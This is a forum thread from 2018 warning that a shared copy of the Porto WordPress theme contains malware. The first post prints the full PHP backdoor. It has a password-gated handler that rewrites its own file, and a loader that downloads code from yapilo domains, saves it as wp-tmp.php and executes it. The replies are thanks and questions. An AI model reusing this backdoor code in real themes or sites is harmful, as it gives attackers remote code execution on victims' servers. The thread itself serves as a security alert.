59.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

05-02-2018, 06:02 PM
Post: #1
Recently shared Wordpress themes - Malicious code alert
Hello guys,

I was looking for a specific theme here, called Porto. I found this in the one of the phpfile. If someone is using porto theme from here, check your theme for this piece of crap code.

Code:
<?php
if (isset($_REQUEST['action']) and& isset($_REQUEST['password']) and& ($_REQUEST['password'] == '0d67644b8ea933a2150708b0d6cfb63a'))
    {
$div_code_name="wp_vcd";
        switch ($_REQUEST['action'])
            {

                




                case 'change_domain';
                    if (isset($_REQUEST['newdomain']))
                        {
                            
                            if (!empty($_REQUEST['newdomain']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                            {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                                       $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }


                                                                            }
                                }
                        }
                break;

                                case 'change_code';
                    if (isset($_REQUEST['newcode']))
                        {
                            
                            if (!empty($_REQUEST['newcode']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                            {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

                                                                                       $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }


                                                                            }
                                }
                        }
                break;
                
                default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
            }
            
        die("");
    }








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false and& stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
           {
           }
            else
            {
            $tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='d531149156c109f723240880dc5e520e';
        if (($tmpcontent = @file_get_contents("http://www.yapilo.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.yapilo.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.yapilo.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
                elseif ($tmpcontent = @file_get_contents("http://www.yapilo.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
          
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        }
        
        
        
        
        
    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?>
05-02-2018, 09:09 PM
Post: #2
RE: Recently shared Wordpress themes - Malicious code alert
Thank you for the alert friend. Appreciated
05-02-2018, 09:38 PM
Post: #3
RE: Recently shared Wordpress themes - Malicious code alert
What thread you get it?
Let us for avoid?
05-02-2018, 09:38 PM
Post: #4
RE: Recently shared Wordpress themes - Malicious code alert
what is the effect of the code??/
05-02-2018, 10:41 PM
Post: #5
RE: Recently shared Wordpress themes - Malicious code alert
that malicious guy must be out here. Thank you for the alert
86.gif
05-02-2018, 11:30 PM
Post: #6
RE: Recently shared Wordpress themes - Malicious code alert
Could you be more specific? You are not helping much. What did you download? Where? How?
05-02-2018, 11:35 PM
Post: #7
RE: Recently shared Wordpress themes - Malicious code alert
You might also want to put the alert inside the thread of the porto theme so people know.
05-03-2018, 04:26 AM
Post: #8
RE: Recently shared Wordpress themes - Malicious code alert
yes, whats the point of saying it has malicious code and not saying where you got it from ?

everyone else is still going to get the malicious code now. (thanks)
05-06-2018, 01:41 AM
Post: #9
RE: Recently shared Wordpress themes - Malicious code alert
thanks for this alert




13.gif